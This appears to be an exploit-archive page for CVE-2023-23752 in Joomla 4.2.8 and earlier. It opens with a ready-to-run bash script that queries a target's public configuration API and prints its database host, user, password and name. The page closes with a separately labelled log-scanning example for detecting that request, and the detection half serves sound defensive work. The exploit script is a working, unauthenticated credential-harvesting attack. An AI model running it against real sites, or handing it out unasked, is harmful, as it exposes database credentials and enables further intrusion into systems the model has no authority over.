Joomla 4.2.8 Information Disclosure

2024.05.28
Credit: d4t4s3c
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

#!/bin/bash

# Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure
# Date: 2024-05-21
# CVE: CVE-2023-23752
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.joomla.org
# Software Link: https://downloads.joomla.org
# Version: <= 4.2.8
# Tested on: Linux
# Category: Web Application

while getopts ":u:" arg; do
    case ${arg} in
        u) url=${OPTARG}; let parameter_counter+=1 ;;
    esac
done

if [ -z "${url}" ]; then
    echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
    echo -e "\n[-] Usage: CVE-2023-23752.sh -u <url>\n"
    exit 1
else
    echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
    curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp
    echo -e "\n[i] Database info:\n"
    echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/\1/' out.tmp)"
    echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/\1/' out.tmp)"
    echo -e "\e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/\1/' out.tmp)\e[0m"
    echo -e "\e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/\1/' out.tmp)\e[0m"
    echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/\1/' out.tmp)"
    echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/\1/' out.tmp)"
    echo -e "[+] DB Encryption: $(sed -E 's/.*"dbencryption":([0-9]+).*/\1/' out.tmp)\n"
    exit 0
fi
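
The script above sends one request, to /api/index.php/v1/config/application with public=true, so that request is what to look for in web server logs. The following is an added example, not part of the original advisory or the author's script: it scans a combined-format access log for that request. The log lines, function names and the SERVED / NOT-SERVED labels are constructed for illustration, and treating status 200 as the case to investigate first is an assumption.

```bash
#!/bin/bash
# Added example, not from the advisory: report requests to the endpoint the
# script queries, as seen in a combined-format web server access log.

# Constructed sample log lines (documentation-range addresses).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [21/May/2024:10:01:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1843 "-" "curl/8.5.0"
198.51.100.7 - - [21/May/2024:10:03:40 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [21/May/2024:10:05:11 +0000] "GET /api/index.php/v1/config/application?foo=1&public=true HTTP/1.1" 403 220 "-" "curl/8.5.0"
198.51.100.7 - - [21/May/2024:10:07:30 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 95 "-" "Mozilla/5.0"
EOF
}

# Reads log files given as arguments, or stdin when there are none.
# Fields used: $1 client, $4 "[timestamp", $7 request target, $9 status.
# Prints one line per match: LABEL CLIENT TIMESTAMP STATUS
find_config_probes() {
    awk '{
        n = split($7, parts, "?")
        path  = parts[1]
        # Wrap the query in "&" so public=true matches in any position.
        query = "&" (n > 1 ? parts[2] : "") "&"
        if (path ~ /\/api\/index\.php\/v1\/config\/application$/ &&
            index(query, "&public=true&") > 0) {
            # Assumption: a 200 means the configuration was returned.
            label = ($9 == 200) ? "SERVED" : "NOT-SERVED"
            printf "%s %s %s %s\n", label, $1, substr($4, 2), $9
        }
    }' "$@"
}

sample_log | find_config_probes
```

Any SERVED line for a request that carried no API token means the database credentials in the response should be treated as exposed and rotated after upgrading past 4.2.8.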

